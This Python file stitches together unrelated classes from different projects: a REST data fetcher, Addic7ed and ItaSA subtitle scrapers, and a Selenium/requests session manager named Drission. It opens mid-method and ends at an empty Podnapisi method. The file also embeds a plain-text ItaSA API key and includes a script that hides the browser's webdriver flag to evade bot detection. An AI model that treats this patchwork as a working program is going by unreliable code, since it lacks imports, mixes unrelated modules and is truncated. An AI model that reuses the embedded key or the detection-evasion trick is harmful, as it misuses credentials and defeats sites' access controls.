            return self.process_archive_subtitle_files(ZipFile(archive_stream), language, video)
        else:
            raise ValueError('Not a valid archive')
class RestDataMod:
    """Class for handling the data retrieval."""

    def __init__(
        self,
        method,
        resource,
        auth,
        headers,
        data,
        verify_ssl,
        timeout=DEFAULT_TIMEOUT,
        proxy_url=None,
    ):
        """Initialize the data object."""
        self._method = method
        self._resource = resource
        self._auth = auth
        self._headers = headers
        self._request_data = data
        self._verify_ssl = verify_ssl
        self._timeout = timeout
        self._http_session = Session()
        # route both schemes through the proxy when one is configured
        self._proxies = (
            {"http": proxy_url, "https": proxy_url}
            if proxy_url is not None
            else None
        )
        self.data = None
        self.headers = None

    def set_payload(self, payload):
        """Set payload."""
        self._request_data = payload

    def __del__(self):
        """Destroy the http session on destroy."""
        self._http_session.close()

    def set_url(self, url):
        """Set url."""
        self._resource = url

    def update(self):
        """Get the latest data from REST service with provided method."""
        _LOGGER.debug("Updating from %s", self._resource)
        # render each header template into its concrete value
        rendered_headers = {}
        if self._headers:
            rendered_headers = {
                name: template.render()
                for name, template in self._headers.items()
            }
        try:
            reply = self._http_session.request(
                self._method,
                self._resource,
                headers=rendered_headers,
                auth=self._auth,
                data=self._request_data,
                timeout=self._timeout,
                verify=self._verify_ssl,
                proxies=self._proxies,
            )
            self.data = reply.text
            self.headers = reply.headers
        except requests.exceptions.RequestException as ex:
            _LOGGER.warning("Error fetching data: %s failed with %s", self._resource, ex)
            self.data = None
            self.headers = None
        except Exception as err:
            _LOGGER.warning("Unknown error: %s", err)
            self.data = None
            self.headers = None
class Addic7edProvider(Provider):
    """Addic7ed Provider."""
    languages = {Language('por', 'BR')} | {
        Language(l)
        for l in [
            'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu',
            'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv',
            'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld',
            'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi',
            'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho'
        ]
    }
    video_types = (Episode, )
    server_url = 'http://www.addic7ed.com/'
    subtitle_class = Addic7edSubtitle

    def __init__(self, username=None, password=None, random_user_agent=False):
        # credentials are optional, but must come as a pair
        if any((username, password)) and not all((username, password)):
            raise ConfigurationError('Username and password must be specified')
        self.username = username
        self.password = password
        self.logged_in = False
        self.session = None
        self.random_user_agent = random_user_agent

    def initialize(self):
        self.session = Session()
        self.session.headers['User-Agent'] = self._get_user_agent()
        # login
        if self.username and self.password:
            logger.info('Logging in')
            data = {
                'username': self.username,
                'password': self.password,
                'Submit': 'Log in'
            }
            r = self.session.post(self.server_url + 'dologin.php', data,
                                  allow_redirects=False, timeout=10)
            # a successful login redirects (302); anything else is a failure
            if r.status_code != 302:
                raise AuthenticationError(self.username)
            logger.debug('Logged in')
            self.logged_in = True

    def terminate(self):
        # logout
        if self.logged_in:
            logger.info('Logging out')
            r = self.session.get(self.server_url + 'logout.php', timeout=10)
            r.raise_for_status()
            logger.debug('Logged out')
            self.logged_in = False
        self.session.close()

    def _get_user_agent(self):
        """Return the User-Agent to use, random when configured."""
        user_agent = 'Subliminal/%s' % __short_version__
        if self.random_user_agent:
            from autosubliminal.providers.useragents import RANDOM_USER_AGENTS
            # random.choice is the idiomatic form of indexing with randint
            user_agent = random.choice(RANDOM_USER_AGENTS)
            logger.debug('Using random user agent: %s', user_agent)
        return user_agent

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows.php` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict
        """
        # get the show page
        logger.info('Getting show ids')
        r = self.session.get(self.server_url + 'shows.php', timeout=10)
        r.raise_for_status()

        # LXML parser seems to fail when parsing Addic7ed.com HTML markup.
        # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails)
        # Assuming the site's markup is bad, and stripping it down to only contain what's needed.
        show_cells = re.findall(show_cells_re, r.content)
        if show_cells:
            soup = ParserBeautifulSoup(b''.join(show_cells),
                                       ['lxml', 'html.parser'])
        else:
            # If RegEx fails, fall back to original r.content and use 'html.parser'
            soup = ParserBeautifulSoup(r.content, ['html.parser'])

        # populate the show ids
        show_ids = {}
        for show in soup.select('td.version > h3 > a[href^="/show/"]'):
            show_ids[sanitize(show.text)] = int(show['href'][6:])
        logger.debug('Found %d show ids', len(show_ids))

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series, year=None):
        """Search the show id from the `series` and `year`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :return: the show id, if found.
        :rtype: int
        """
        # addic7ed doesn't support search with quotes
        series = series.replace('\'', ' ')

        # build the params
        series_year = '%s %d' % (series, year) if year is not None else series
        params = {'search': series_year, 'Submit': 'Search'}

        # make the search
        logger.info('Searching show ids with %r', params)
        r = self.session.get(self.server_url + 'search.php', params=params,
                             timeout=10)
        r.raise_for_status()
        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # get the suggestion
        suggestion = soup.select('span.titulo > a[href^="/show/"]')
        if not suggestion:
            logger.warning('Show id not found: no suggestion')
            return None
        # `!=` instead of the `not ... == ...` anti-idiom
        if sanitize(suggestion[0].i.text.replace(
                '\'', ' ')) != sanitize(series_year):
            logger.warning('Show id not found: suggestion does not match')
            return None
        show_id = int(suggestion[0]['href'][6:])
        logger.debug('Found show id %d', show_id)

        return show_id

    def get_show_id(self, series, year=None, country_code=None):
        """Get the best matching show id for `series`, `year` and `country_code`.

        First search in the result of :meth:`_get_show_ids` and fallback on a
        search with :meth:`_search_show_id`.

        :param str series: series of the episode.
        :param year: year of the series, if any.
        :type year: int
        :param country_code: country code of the series, if any.
        :type country_code: str
        :return: the show id, if found.
        :rtype: int
        """
        series_sanitized = sanitize(series).lower()
        show_ids = self._get_show_ids()
        show_id = None

        # attempt with country
        if not show_id and country_code:
            logger.debug('Getting show id with country')
            show_id = show_ids.get('%s %s' % (series_sanitized,
                                              country_code.lower()))

        # attempt with year
        if not show_id and year:
            logger.debug('Getting show id with year')
            show_id = show_ids.get('%s %d' % (series_sanitized, year))

        # attempt clean
        if not show_id:
            logger.debug('Getting show id')
            show_id = show_ids.get(series_sanitized)

        # search as last resort
        if not show_id:
            logger.warning('Series not found in show ids')
            show_id = self._search_show_id(series)

        return show_id

    def query(self, series, season, year=None, country=None):
        """List the completed subtitles of a show's season page."""
        # get the show id
        show_id = self.get_show_id(series, year, country)
        if show_id is None:
            logger.error('No show id found for %r (%r)', series, {
                'year': year,
                'country': country
            })
            return []

        # get the page of the season of the show
        logger.info('Getting the page of show id %d, season %d', show_id,
                    season)
        r = self.session.get(self.server_url + 'show/%d' % show_id,
                             params={'season': season}, timeout=10)
        r.raise_for_status()

        if not r.content:
            # Provider returns a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.debug('No data returned from provider')
            return []

        soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser'])

        # loop over subtitle rows
        match = series_year_re.match(
            soup.select('#header font')[0].text.strip()[:-10])
        series = match.group('series')
        year = int(match.group('year')) if match.group('year') else None
        subtitles = []
        for row in soup.select('tr.epeven'):
            cells = row('td')

            # ignore incomplete subtitles
            status = cells[5].text
            if status != 'Completed':
                logger.debug('Ignoring subtitle with status %s', status)
                continue

            # read the item
            language = Language.fromaddic7ed(cells[3].text)
            hearing_impaired = bool(cells[6].text)
            page_link = self.server_url + cells[2].a['href'][1:]
            season = int(cells[0].text)
            episode = int(cells[1].text)
            title = cells[2].text
            version = cells[4].text
            download_link = cells[9].a['href'][1:]

            subtitle = self.subtitle_class(language, hearing_impaired,
                                           page_link, series, season, episode,
                                           title, year, version, download_link)
            logger.debug('Found subtitle %r', subtitle)
            subtitles.append(subtitle)

        return subtitles

    def list_subtitles(self, video, languages):
        # try the primary title first, then the alternative ones
        titles = [video.series] + video.alternative_series
        for title in titles:
            subtitles = [
                s for s in self.query(title, video.season, video.year)
                if s.language in languages and s.episode == video.episode
            ]
            if subtitles:
                return subtitles

        return []

    def download_subtitle(self, subtitle):
        # download the subtitle
        logger.info('Downloading subtitle %r', subtitle)
        r = self.session.get(self.server_url + subtitle.download_link,
                             headers={'Referer': subtitle.page_link},
                             timeout=10)
        r.raise_for_status()

        if not r.content:
            # Provider returns a status of 304 Not Modified with an empty content
            # raise_for_status won't raise exception for that status code
            logger.debug(
                'Unable to download subtitle. No data returned from provider')
            return

        # detect download limit exceeded (HTML error page instead of subtitle);
        # .get() avoids a KeyError if the header is ever missing
        if r.headers.get('Content-Type') == 'text/html':
            raise DownloadLimitExceeded

        subtitle.content = fix_line_ending(r.content)
class ItaSAProvider(Provider):
    """Provider for italiansubs.net, using its REST API.

    Requires a username/password pair (both or neither); queries need a
    successful login (``initialize``) before use.
    """
    languages = {Language('ita')}
    video_types = (Episode,)
    server_url = 'https://api.italiansubs.net/api/rest/'
    apikey = 'd86ad6ec041b334fac1e512174ee04d5'

    def __init__(self, username=None, password=None):
        if username is not None and password is None or username is None and password is not None:
            raise ConfigurationError('Username and password must be specified')

        self.username = username
        self.password = password
        self.logged_in = False
        self.login_itasa = False
        self.session = None
        self.auth_code = None

    def initialize(self):
        """Open the HTTP session and log in to both the API and the website."""
        self.session = Session()
        self.session.headers['User-Agent'] = 'Subliminal/{}'.format(__version__)

        # login
        if self.username is not None and self.password is not None:
            logger.info('Logging in')
            params = {
                'username': self.username,
                'password': self.password,
                'apikey': self.apikey
            }
            r = self.session.get(self.server_url + 'users/login', params=params, timeout=10)
            root = etree.fromstring(r.content)

            if root.find('status').text == 'fail':
                raise AuthenticationError(root.find('error/message').text)

            # authcode is required later by subtitles/download
            self.auth_code = root.find('data/user/authcode').text

            # second, cookie-based login on the website itself (needed for downloads)
            data = {
                'username': self.username,
                'passwd': self.password,
                'remember': 'yes',
                'option': 'com_user',
                'task': 'login',
                'silent': 'true'
            }
            r = self.session.post('http://www.italiansubs.net/index.php', data=data, timeout=30)
            r.raise_for_status()

            self.logged_in = True

    def terminate(self):
        """Close the HTTP session and drop the logged-in state."""
        self.session.close()
        self.logged_in = False

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _get_show_ids(self):
        """Get the ``dict`` of show ids per series by querying the `shows` page.

        :return: show id per series, lower case and without quotes.
        :rtype: dict
        """
        # get the show page
        logger.info('Getting show ids')
        params = {'apikey': self.apikey}
        r = self.session.get(self.server_url + 'shows', timeout=10, params=params)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        # populate the show ids
        show_ids = {}
        for show in root.findall('data/shows/show'):
            if show.find('name').text is None:  # pragma: no cover
                continue
            show_ids[sanitize(show.find('name').text).lower()] = int(show.find('id').text)
        logger.debug('Found %d show ids', len(show_ids))

        return show_ids

    @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME)
    def _search_show_id(self, series):
        """Search the show id from the `series`

        :param str series: series of the episode.
        :return: the show id, if found.
        :rtype: int or None
        """
        # build the param
        params = {'apikey': self.apikey, 'q': series}

        # make the search
        logger.info('Searching show ids with %r', params)
        r = self.session.get(self.server_url + 'shows/search', params=params, timeout=10)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Show id not found: no suggestion')
            return None

        # Looking for show in first page
        for show in root.findall('data/shows/show'):
            if sanitize(show.find('name').text).lower() == sanitize(series.lower()):
                show_id = int(show.find('id').text)
                logger.debug('Found show id %d', show_id)

                return show_id

        # Not in the first page of result try next (if any)
        next_page = root.find('data/next')
        while next_page.text is not None:  # pragma: no cover
            r = self.session.get(next_page.text, timeout=10)
            r.raise_for_status()
            root = etree.fromstring(r.content)

            logger.info('Loading suggestion page %r', root.find('data/page').text)

            # Looking for show in following pages
            for show in root.findall('data/shows/show'):
                if sanitize(show.find('name').text).lower() == sanitize(series.lower()):
                    show_id = int(show.find('id').text)
                    logger.debug('Found show id %d', show_id)

                    return show_id

            next_page = root.find('data/next')

        # No matches found
        logger.warning('Show id not found: suggestions does not match')

        return None

    def get_show_id(self, series, country_code=None):
        """Get the best matching show id for `series`.

        First search in the result of :meth:`_get_show_ids` and fallback on a search with
        :meth:`_search_show_id`

        :param str series: series of the episode.
        :param str country_code: the country in which the show is aired.
        :return: the show id, if found.
        :rtype: int or None
        """
        series_sanitized = sanitize(series).lower()
        show_ids = self._get_show_ids()
        show_id = None

        # attempt with country
        if not show_id and country_code:
            logger.debug('Getting show id with country')
            show_id = show_ids.get('{0} {1}'.format(series_sanitized, country_code.lower()))

        # attempt clean
        if not show_id:
            logger.debug('Getting show id')
            show_id = show_ids.get(series_sanitized)

        # search as last resort
        if not show_id:
            logger.warning('Series not found in show ids')
            show_id = self._search_show_id(series)

        return show_id

    @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME)
    def _download_zip(self, sub_id):
        """Download the raw (zip) payload of subtitle `sub_id`."""
        # download the subtitle
        logger.info('Downloading subtitle %r', sub_id)
        params = {
            'authcode': self.auth_code,
            'apikey': self.apikey,
            'subtitle_id': sub_id
        }
        r = self.session.get(self.server_url + 'subtitles/download', params=params, timeout=30)
        r.raise_for_status()

        return r.content

    def _get_season_subtitles(self, show_id, season, sub_format):
        """Fetch the whole-season zip for `show_id`/`season` and explode it into subtitles."""
        # '%' acts as the API's wildcard in the query string
        params = {
            'apikey': self.apikey,
            'show_id': show_id,
            'q': 'Stagione %{}'.format(season),
            'version': sub_format
        }
        r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Subtitles for season not found, try with rip suffix')

            params['version'] = sub_format + 'rip'
            r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)
            if int(root.find('data/count').text) == 0:
                logger.warning('Subtitles for season not found')
                return []

        subs = []
        # Looking for subtitles in first page
        season_re = re.compile(r'.*?stagione 0*?{}.*'.format(season))
        for subtitle in root.findall('data/subtitles/subtitle'):
            if season_re.match(subtitle.find('name').text.lower()):
                logger.debug('Found season zip id %d - %r - %r',
                             int(subtitle.find('id').text),
                             subtitle.find('name').text,
                             subtitle.find('version').text)

                content = self._download_zip(int(subtitle.find('id').text))
                if not is_zipfile(io.BytesIO(content)):  # pragma: no cover
                    # content is bytes (requests r.content): compare against a bytes literal
                    if b'limite di download' in content:
                        raise TooManyRequests()
                    else:
                        raise ConfigurationError('Not a zip file: {!r}'.format(content))

                with ZipFile(io.BytesIO(content)) as zf:
                    episode_re = re.compile(r's(\d{1,2})e(\d{1,2})')
                    for index, name in enumerate(zf.namelist()):
                        match = episode_re.search(name)
                        if not match:  # pragma: no cover
                            logger.debug('Cannot decode subtitle %r', name)
                        else:
                            sub = ItaSASubtitle(
                                int(subtitle.find('id').text),
                                subtitle.find('show_name').text,
                                int(match.group(1)),
                                int(match.group(2)),
                                None,
                                None,
                                None,
                                name)
                            sub.content = fix_line_ending(zf.read(name))
                            subs.append(sub)

        return subs

    def query(self, series, season, episode, video_format, resolution, country=None):
        """Query the provider for an episode's subtitles; falls back to season-zip mode.

        :param str series: series name.
        :param int season: season number.
        :param int episode: episode number.
        :param video_format: video format (e.g. ``'HDTV'``) used to pick the subtitle version.
        :param resolution: video resolution (e.g. ``'720p'``), used when format is HDTV/unknown.
        :param country: optional country code to disambiguate the show.
        :return: the found subtitles with their content already downloaded.
        :rtype: list
        """
        # To make queries you need to be logged in
        if not self.logged_in:  # pragma: no cover
            raise ConfigurationError('Cannot query if not logged in')

        # get the show id
        show_id = self.get_show_id(series, country)
        if show_id is None:
            logger.error('No show id found for %r ', series)
            return []

        # get the page of the season of the show
        logger.info('Getting the subtitle of show id %d, season %d episode %d, format %r',
                    show_id, season, episode, video_format)
        subtitles = []

        # Default format is SDTV
        if not video_format or video_format.lower() == 'hdtv':
            if resolution in ('1080i', '1080p', '720p'):
                sub_format = resolution
            else:
                sub_format = 'normale'
        else:
            sub_format = video_format.lower()

        # Look for year
        params = {
            'apikey': self.apikey
        }
        r = self.session.get(self.server_url + 'shows/' + str(show_id), params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        year = root.find('data/show/started').text
        if year:
            year = int(year.split('-', 1)[0])
        tvdb_id = root.find('data/show/id_tvdb').text
        if tvdb_id:
            tvdb_id = int(tvdb_id)

        params = {
            'apikey': self.apikey,
            'show_id': show_id,
            'q': '{0}x{1:02}'.format(season, episode),
            'version': sub_format
        }
        r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
        r.raise_for_status()
        root = etree.fromstring(r.content)

        if int(root.find('data/count').text) == 0:
            logger.warning('Subtitles not found, try with rip suffix')

            params['version'] = sub_format + 'rip'
            r = self.session.get(self.server_url + 'subtitles/search', params=params, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)
            if int(root.find('data/count').text) == 0:
                logger.warning('Subtitles not found, go season mode')

                # If no subtitle are found for single episode try to download all season zip
                subs = self._get_season_subtitles(show_id, season, sub_format)
                if subs:
                    for subtitle in subs:
                        subtitle.format = video_format
                        subtitle.year = year
                        subtitle.tvdb_id = tvdb_id

                    return subs
                else:
                    return []

        # Looking for subtitles in first page
        for subtitle in root.findall('data/subtitles/subtitle'):
            if '{0}x{1:02}'.format(season, episode) in subtitle.find('name').text.lower():
                logger.debug('Found subtitle id %d - %r - %r',
                             int(subtitle.find('id').text),
                             subtitle.find('name').text,
                             subtitle.find('version').text)

                sub = ItaSASubtitle(
                    int(subtitle.find('id').text),
                    subtitle.find('show_name').text,
                    season,
                    episode,
                    video_format,
                    year,
                    tvdb_id,
                    subtitle.find('name').text)

                subtitles.append(sub)

        # Not in the first page of result try next (if any)
        next_page = root.find('data/next')
        while next_page.text is not None:  # pragma: no cover
            r = self.session.get(next_page.text, timeout=30)
            r.raise_for_status()
            root = etree.fromstring(r.content)

            # FIX: was `root.data.page.text`, which raises AttributeError on an
            # ElementTree Element; navigate with find() like everywhere else
            logger.info('Loading subtitles page %r', root.find('data/page').text)

            # Looking for show in following pages
            for subtitle in root.findall('data/subtitles/subtitle'):
                if '{0}x{1:02}'.format(season, episode) in subtitle.find('name').text.lower():
                    logger.debug('Found subtitle id %d - %r - %r',
                                 int(subtitle.find('id').text),
                                 subtitle.find('name').text,
                                 subtitle.find('version').text)

                    sub = ItaSASubtitle(
                        int(subtitle.find('id').text),
                        subtitle.find('show_name').text,
                        season,
                        episode,
                        video_format,
                        year,
                        tvdb_id,
                        subtitle.find('name').text)

                    subtitles.append(sub)

            next_page = root.find('data/next')

        # Download the subs found, can be more than one in zip
        additional_subs = []
        for sub in subtitles:
            # open the zip
            content = self._download_zip(sub.sub_id)
            if not is_zipfile(io.BytesIO(content)):  # pragma: no cover
                # content is bytes (requests r.content): compare against a bytes literal
                if b'limite di download' in content:
                    raise TooManyRequests()
                else:
                    raise ConfigurationError('Not a zip file: {!r}'.format(content))

            with ZipFile(io.BytesIO(content)) as zf:
                if len(zf.namelist()) > 1:  # pragma: no cover
                    # season zips may contain several files: first one fills `sub`,
                    # the others become deep copies with their own content
                    for index, name in enumerate(zf.namelist()):
                        if index == 0:
                            # First element
                            sub.content = fix_line_ending(zf.read(name))
                            sub.full_data = name
                        else:
                            add_sub = copy.deepcopy(sub)
                            add_sub.content = fix_line_ending(zf.read(name))
                            add_sub.full_data = name
                            additional_subs.append(add_sub)
                else:
                    sub.content = fix_line_ending(zf.read(zf.namelist()[0]))
                    sub.full_data = zf.namelist()[0]

        return subtitles + additional_subs

    def list_subtitles(self, video, languages):
        return self.query(video.series, video.season, video.episode, video.format, video.resolution)

    def download_subtitle(self, subtitle):  # pragma: no cover
        # content is already downloaded by query()
        pass
class Drission(object):
    """Manages a WebDriver object and a Session object; acts as the driver layer."""

    def __init__(self,
                 driver_or_options: Union[RemoteWebDriver, Options, DriverOptions, bool] = None,
                 session_or_options: Union[Session, dict, SessionOptions, bool] = None,
                 ini_path: str = None,
                 proxy: dict = None):
        """Initialise from ready-made WebDriver/Session objects, or from their configuration. \n
        :param driver_or_options: a driver object or a DriverOptions/Options object; pass False for an empty config
        :param session_or_options: a Session object or a settings dict; pass False for an empty config
        :param ini_path: path to the ini configuration file
        :param proxy: proxy settings dict
        """
        self._session = None
        self._driver = None
        self._session_options = None
        self._driver_options = None
        self._debugger = None
        self._proxy = proxy

        # ------------------ handle session options ----------------------
        if session_or_options is None:
            self._session_options = SessionOptions(ini_path=ini_path).as_dict()
        elif session_or_options is False:
            self._session_options = SessionOptions(read_file=False).as_dict()
        elif isinstance(session_or_options, Session):
            self._session = session_or_options
        elif isinstance(session_or_options, SessionOptions):
            self._session_options = session_or_options.as_dict()
        elif isinstance(session_or_options, dict):
            self._session_options = session_or_options
        else:
            raise TypeError(
                'session_or_options参数只能接收Session, dict, SessionOptions或False。')

        # ------------------ handle driver options ----------------------
        if driver_or_options is None:
            self._driver_options = DriverOptions(ini_path=ini_path)
        elif driver_or_options is False:
            self._driver_options = DriverOptions(read_file=False)
        elif isinstance(driver_or_options, RemoteWebDriver):
            self._driver = driver_or_options
        elif isinstance(driver_or_options, (Options, DriverOptions)):
            self._driver_options = driver_or_options
        else:
            raise TypeError(
                'driver_or_options参数只能接收WebDriver, Options, DriverOptions或False。'
            )

    def __del__(self):
        """Close the browser and Session when the object is destroyed."""
        try:
            self.close()
        # ImportError can occur during interpreter shutdown when modules
        # used by close() are already torn down
        except ImportError:
            pass

    @property
    def session(self) -> Session:
        """Return the Session object, creating it from the stored config on first access."""
        if self._session is None:
            self._set_session(self._session_options)

            if self._proxy:
                self._session.proxies = self._proxy

        return self._session

    @property
    def driver(self) -> WebDriver:
        """Return the WebDriver object, creating it from the stored config on first access. \n
        If a local debugging browser is configured, attach to it or start the browser process.
        """
        if self._driver is None:
            if not self.driver_options.debugger_address and self._proxy:
                self.driver_options.add_argument(
                    f'--proxy-server={self._proxy["http"]}')

            driver_path = self.driver_options.driver_path or 'chromedriver'
            chrome_path = self.driver_options.binary_location or 'chrome.exe'

            # ----------- if a debug port is set and not in use, start the browser process first -----------
            if self.driver_options.debugger_address and _check_port(
                    self.driver_options.debugger_address) is False:
                from subprocess import Popen
                port = self.driver_options.debugger_address.split(':')[-1]

                # start the browser process and get back the chrome.exe path it uses
                chrome_path, self._debugger = _create_chrome(
                    chrome_path, port, self.driver_options.arguments,
                    self._proxy)

            # ----------- create the WebDriver object -----------
            self._driver = _create_driver(chrome_path, driver_path,
                                          self.driver_options)

            # anti-anti-bot tweak: hide navigator.webdriver
            try:
                self._driver.execute_script(
                    'Object.defineProperty(navigator,"webdriver",{get:() => undefined,});'
                )
            except Exception:
                pass

            # self._driver.execute_cdp_cmd(
            #     'Page.addScriptToEvaluateOnNewDocument',
            #     {'source': 'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});'})

        return self._driver

    @property
    def driver_options(self) -> Union[DriverOptions, Options]:
        """Return the driver configuration."""
        return self._driver_options

    @property
    def session_options(self) -> dict:
        """Return the session configuration."""
        return self._session_options

    @session_options.setter
    def session_options(self, options: Union[dict, SessionOptions]) -> None:
        """Set the session configuration and re-apply it to the Session. \n
        :param options: session configuration dict or SessionOptions
        :return: None
        """
        self._session_options = _session_options_to_dict(options)
        self._set_session(self._session_options)

    @property
    def proxy(self) -> Union[None, dict]:
        """Return the proxy settings."""
        return self._proxy

    @proxy.setter
    def proxy(self, proxies: dict = None) -> None:
        """Set the proxy settings; restarts the driver (preserving cookies and URL) if one exists. \n
        :param proxies: proxy settings dict
        :return: None
        """
        self._proxy = proxies

        if self._session:
            self._session.proxies = proxies

        if self._driver:
            # restart the browser with the new proxy, then restore state
            cookies = self._driver.get_cookies()
            url = self._driver.current_url
            self._driver.quit()
            self._driver = None
            self._driver = self.driver
            self._driver.get(url)

            for cookie in cookies:
                self.set_cookies(cookie, set_driver=True)

    @property
    def debugger_progress(self):
        """Return the debugging browser process (Popen), if this object started one."""
        return self._debugger

    def kill_browser(self) -> None:
        """Kill the browser process (when possible)."""
        if self.debugger_progress:
            self.debugger_progress.kill()
            return

        pid = self.get_browser_progress_id()
        from os import popen
        from platform import system
        # on Windows, kill by pid only when the pid really belongs to chrome.exe
        if pid and system().lower() == 'windows' \
                and popen(f'tasklist | findstr {pid}').read().lower().startswith('chrome.exe'):
            popen(f'taskkill /pid {pid} /F')
        else:
            self._driver.quit()

    def get_browser_progress_id(self) -> Union[str, None]:
        """Return the browser process id, or None if it cannot be determined."""
        if self.debugger_progress:
            return self.debugger_progress.pid

        address = str(self.driver_options.debugger_address).split(':')
        if len(address) == 2:
            ip, port = address
            # only a local debugger address can be resolved via netstat
            if ip not in ('127.0.0.1', 'localhost') or not port.isdigit():
                return None

            from os import popen
            txt = ''
            progresses = popen(f'netstat -nao | findstr :{port}').read().split(
                '\n')
            for progress in progresses:
                if 'LISTENING' in progress:
                    txt = progress
                    break
            if not txt:
                return None

            # last whitespace-separated column of the netstat line is the pid
            return txt.split(' ')[-1]

    def hide_browser(self) -> None:
        """Hide the browser window."""
        self._show_or_hide_browser()

    def show_browser(self) -> None:
        """Show the browser window."""
        self._show_or_hide_browser(False)

    def _show_or_hide_browser(self, hide: bool = True) -> None:
        """Show or hide the browser window via win32 APIs (Windows only)."""
        from platform import system
        if system().lower() != 'windows':
            raise OSError('该方法只能在Windows系统使用。')

        try:
            from win32gui import ShowWindow
            from win32con import SW_HIDE, SW_SHOW
        except ImportError:
            raise ImportError('请先安装:pip install pypiwin32')

        pid = self.get_browser_progress_id()
        if not pid:
            print(
                '只有设置了debugger_address参数才能使用 show_browser() 和 hide_browser()')
            return
        hds = _get_chrome_hwnds_from_pid(pid)
        sw = SW_HIDE if hide else SW_SHOW
        for hd in hds:
            ShowWindow(hd, sw)

    def set_cookies(self,
                    cookies: Union[RequestsCookieJar, list, tuple, str, dict],
                    set_session: bool = False,
                    set_driver: bool = False) -> None:
        """Set cookies on the session and/or the driver. \n
        :param cookies: cookie data; accepts CookieJar, list, tuple, str or dict
        :param set_session: whether to set the session's cookies
        :param set_driver: whether to set the driver's cookies
        :return: None
        """
        cookies = _cookies_to_tuple(cookies)

        for cookie in cookies:
            if cookie['value'] is None:
                cookie['value'] = ''

            # add the cookie to the session
            if set_session:
                # requests' cookies.set rejects these keys as kwargs
                kwargs = {
                    x: cookie[x]
                    for x in cookie if x.lower() not in ('name', 'value',
                                                         'httponly', 'expiry',
                                                         'samesite')
                }

                if 'expiry' in cookie:
                    kwargs['expires'] = cookie['expiry']

                self.session.cookies.set(cookie['name'], cookie['value'],
                                         **kwargs)

            # add the cookie to the driver
            if set_driver:
                if 'expiry' in cookie:
                    cookie['expiry'] = int(cookie['expiry'])

                try:
                    browser_domain = extract(self.driver.current_url).fqdn
                except AttributeError:
                    browser_domain = ''

                if not cookie.get('domain', None):
                    if browser_domain:
                        url = extract(browser_domain)
                        cookie_domain = f'{url.domain}.{url.suffix}'
                    else:
                        raise ValueError('cookie中没有域名或浏览器未访问过URL。')

                    cookie['domain'] = cookie_domain

                else:
                    # strip a leading '.' for the domain comparison below
                    cookie_domain = cookie['domain'] if cookie['domain'][
                        0] != '.' else cookie['domain'][1:]

                # the driver can only set cookies for the domain it is on
                if cookie_domain not in browser_domain:
                    self.driver.get(cookie_domain if cookie_domain.startswith(
                        'http://') else f'http://{cookie_domain}')

                # selenium auto-prepends '.', which would prevent overwriting an existing cookie
                if cookie['domain'][0] != '.':
                    c = self.driver.get_cookie(cookie['name'])
                    if c and c['domain'] == cookie['domain']:
                        self.driver.delete_cookie(cookie['name'])

                self.driver.add_cookie(cookie)

    def _set_session(self, data: dict) -> None:
        """Configure the session from a settings dict. \n
        :param data: session configuration dict
        :return: None
        """
        if self._session is None:
            self._session = Session()

        attrs = [
            'headers', 'auth', 'proxies', 'hooks', 'params', 'verify', 'cert',
            'stream', 'trust_env', 'max_redirects'
        ]  # , 'adapters'
        if 'cookies' in data:
            self.set_cookies(data['cookies'], set_session=True)

        for i in attrs:
            if i in data:
                self._session.__setattr__(i, data[i])

    def cookies_to_session(self, copy_user_agent: bool = False) -> None:
        """Copy the driver's cookies to the session object. \n
        :param copy_user_agent: whether to copy the user-agent string as well
        :return: None
        """
        if copy_user_agent:
            user_agent_to_session(self.driver, self.session)

        self.set_cookies(self.driver.get_cookies(), set_session=True)

    def cookies_to_driver(self, url: str) -> None:
        """Copy the session's cookies to the driver object. \n
        :param url: scope (domain) the cookies apply to
        :return: None
        """
        browser_domain = extract(self.driver.current_url).fqdn
        ex_url = extract(url)
        if ex_url.fqdn not in browser_domain:
            self.driver.get(url)

        domain = f'{ex_url.domain}.{ex_url.suffix}'

        cookies = []
        for cookie in self.session.cookies:
            if cookie.domain == '':
                cookie.domain = domain

            if domain in cookie.domain:
                cookies.append(cookie)

        self.set_cookies(cookies, set_driver=True)

    def close_driver(self, kill: bool = False) -> None:
        """Close the driver and the browser."""
        if self._driver:
            if kill:
                self.kill_browser()
            else:
                self._driver.quit()

            self._driver = None

    def close_session(self) -> None:
        """Close the session."""
        if self._session:
            self._session.close()
            self._session = None

    def close(self) -> None:
        """Close the session, the driver and the browser."""
        if self._driver:
            self.close_driver()

        if self._session:
            self.close_session()
class PodnapisiProvider(Provider):
    """Provider for podnapisi.net, paging through its legacy XML search API."""

    languages = {Language("por", "BR"), Language("srp", script="Latn")} | {
        Language.fromalpha2(l) for l in language_converters["alpha2"].codes
    }
    video_types = (Episode, Movie)
    server_url = "http://podnapisi.net/subtitles/"

    def initialize(self):
